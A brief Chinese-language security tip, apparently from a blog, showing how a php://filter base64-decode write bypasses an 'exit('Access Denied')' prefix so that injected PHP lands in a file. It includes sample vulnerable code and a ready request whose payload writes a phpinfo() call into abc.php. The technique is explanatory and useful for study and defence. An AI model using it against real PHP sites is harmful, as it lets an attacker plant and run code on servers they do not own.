经常会碰到'Access Denied',如何绕过呢?请详细阅读本文作者带来的小技巧。 register_globals = On ? php $sqlcontent = ?PHPexit('AccessDenied');? . $p . n ; file_put_contents ( $logfile , $sqlcontent ); ? exp-demo.php?logfile=php://filter/writ
经常会碰到'Access Denied',如何绕过呢?请详细阅读本文作者带来的小技巧。
register_globals = On
<ol class="dp-c">
<li class="alt"><span><span><?<font color="#fe6600">php</font> </span></span></li><li><span class="vars"><font color="#008284">$sqlcontent</font></span><span> = </span><span class="string"><font color="#006699">"<?PHP exit('Access Denied'); ?>"</span><span>.</span><span class="vars"><font color="#008284">$p</font></span><span>.</span><span class="string"><font color="#006699">"\n"</font></span><span>; </span></span></li>
<li class="alt">
<span class="func">file_put_contents</span><span>(</span><span class="vars"><font color="#008284">$logfile</font></span><span>, </span><span class="vars"><font color="#008284">$sqlcontent</font></span><span>); </span>
</li>
<li><span>?> </span></li>
</ol>
exp-demo.php?logfile=php://filter/write=convert.base64-decode/resource=abc.php&p=aPD9waHAgcGhwaW5mbygpOy8vPz4=
base64-decode会掉过不能解码的特殊字符,变成PHPexitAccessDenied,Base64编码要求把3个8位字节(3*8=24)转化为4个6位的字节(4*6=24),保证能顺利解码补齐字符随便加个a补齐20位。(利用 base64 发生乱码)
参考
http://marc.info/?l=full-disclosure&m=126034719521671&w=2
http://docs.php.net/manual/zh/filters.convert.php
